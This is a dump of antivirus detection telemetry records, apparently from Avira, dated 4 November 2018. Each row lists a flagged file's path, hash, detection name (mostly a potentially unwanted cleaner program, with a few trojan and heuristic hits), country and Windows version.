  Row(detection=Row(filename='avscan-20181104-233355-93614bb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3284563\\AVSCAN-20181104-232222-3AD0C4A6\\AVSCAN-20181104-233355-93614BB2', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:34:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204658-8361b133', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204658-8361B133', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204204-5c1977e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204204-5C1977E1', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203855-1664eed3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203855-1664EED3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182324-04bab2de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-182324-04BAB2DE', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:23:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203402-1bb9e659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203402-1BB9E659', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191402-de771fa0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d52d695b\\AVSCAN-20181104-190519-9EB7E399\\AVSCAN-20181104-191402-DE771FA0', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:17:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184648-c0571169', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184648-C0571169', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:46:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203832-11be6267', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203832-11BE6267', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202117-b5917a82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202117-B5917A82', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201453-824d9639', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201453-824D9639', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193650-0b9db28b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-193650-0B9DB28B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185502-02593dd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185502-02593DD3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203202-0bb5e30b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203202-0BB5E30B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:32:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-212239-f7c6f647', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0678b562\\AVSCAN-20181103-203524-E56FFA60\\AVSCAN-20181103-212239-F7C6F647', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:22:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193857-265a94cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-193857-265A94CC', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:38:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204627-7f39adcc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204627-7F39ADCC', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202453-d25a5852', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202453-D25A5852', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204532-77f3e46a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204532-77F3E46A', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:45:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203133-07e2585c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203133-07E2585C', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:31:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182957-c4c5a408', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-182957-C4C5A408', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:29:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203649-fc131d42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203649-FC131D42', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203640-fa562185', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203640-FA562185', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202232-bf8f3d8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202232-BF8F3D8E', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:22:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203645-317bdebb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203645-317BDEBB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202400-cb4688d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202400-CB4688D3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:23:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194141-48730c93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-194141-48730C93', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:41:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202158-baf3fdf5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202158-BAF3FDF5', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202151-ba0722e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202151-BA0722E0', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202127-b6e1dbaa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202127-B6E1DBAA', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205327-b757ce0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205327-B757CE0D', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184906-d2be3955', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184906-D2BE3955', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:49:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202735-e812703c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202735-E812703C', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184447-b01db7b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184447-B01DB7B4', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:44:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185352-f8f9b27f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185352-F8F9B27F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:53:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205306-b48eaab3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205306-B48EAAB3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184500-b1e3efb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184500-B1E3EFB9', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:44:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185448-00785f93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185448-00785F93', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:54:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205349-ba476f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205349-BA476F2C', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204949-9f1d8692', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-204949-9F1D8692', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:49:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185803-254c9de6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-185803-254C9DE6', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:58:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232926-7111b5d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3284563\\AVSCAN-20181104-232222-3AD0C4A6\\AVSCAN-20181104-232926-7111B5D3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:29:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201852-a222103b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201852-A222103B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204418-6df776eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204418-6DF776EB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:44:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204449-72168298', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204449-72168298', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:44:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202429-cf3685d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202429-CF3685D2', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184819-cc83da33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184819-CC83DA33', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:48:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b116900bf58998f4fe2a52084bc92182715b67cf2fa3585d583464cf25919455', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B116900BF58998F4FE2A52084BC92182715B67CF2FA3585D583464CF25919455', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b116900bf58998f4fe2a52084bc92182715b67cf2fa3585d583464cf25919455', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:35:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hdh.exe', filepath='C:\\Windows\\hdh.exe', filesize=192000, name='HEUR/AGEN.1021412.#M1.#R1'), hash='b144c88a07b644e8498b699f5ca074d632b300be7e31dad068f2b5ea31186365', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T07:14:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hdh.exe', filepath='C:\\Windows\\hdh.exe', filesize=192000, name='HEUR/AGEN.1021412.#M1.#R1'), hash='b144c88a07b644e8498b699f5ca074d632b300be7e31dad068f2b5ea31186365', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T07:14:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='бланк письма 2014 пособие доп..exe', filepath='\\\\?\\F:\\Проф\\Бланк письма 2014 пособие доп..exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b1567728f7c9c301faf0e69894160bc87eea4da220c5850aa5f9d4863d75c3cf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:32Z'), dt=datetime.date(2018, 11, 4)),
